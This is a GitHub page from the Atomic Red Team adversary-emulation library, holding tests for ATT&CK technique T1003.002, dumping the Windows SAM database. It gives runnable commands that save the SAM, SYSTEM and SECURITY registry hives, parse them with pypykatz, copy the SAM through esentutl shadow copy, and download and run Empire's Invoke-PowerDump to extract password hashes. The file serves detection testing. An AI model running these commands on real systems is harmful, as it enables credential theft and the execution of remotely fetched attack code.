Skip to content

Latest commit

 

History

History
184 lines (107 loc) · 4.8 KB

T1003.002.md

File metadata and controls

184 lines (107 loc) · 4.8 KB
Raw

T1003.002 - Security Account Manager

Description from ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • reg save HKLM\sam sam
  • reg save HKLM\system system

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.
  • RID 501 is the guest account.
  • User accounts start with a RID of 1,000+.

Atomic Tests


Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul


Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pypykatz live registry

Dependencies: Run with powershell!

Description: Computer must have python 3 installed
Check Prereq Commands:
if (python --version) {exit 0} else {exit 1}
Get Prereq Commands:
echo "Python 3 must be installed manually"
Description: Computer must have pip installed
Check Prereq Commands:
if (pip3 -V) {exit 0} else {exit 1}
Get Prereq Commands:
echo "PIP must be installed manually"
Description: pypykatz must be installed and part of PATH
Check Prereq Commands:
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
Get Prereq Commands:
pip3 install pypykatz


Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
file_path Path to the file to copy Path %SystemRoot%/system32/config/SAM
file_name Name of the copied file String SAM
copy_dest Destination of the copied file String %windir%

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}


Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames

Executes a hashdump by reading the hasshes from the registry.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module .\PowerDump.ps1
Invoke-PowerDump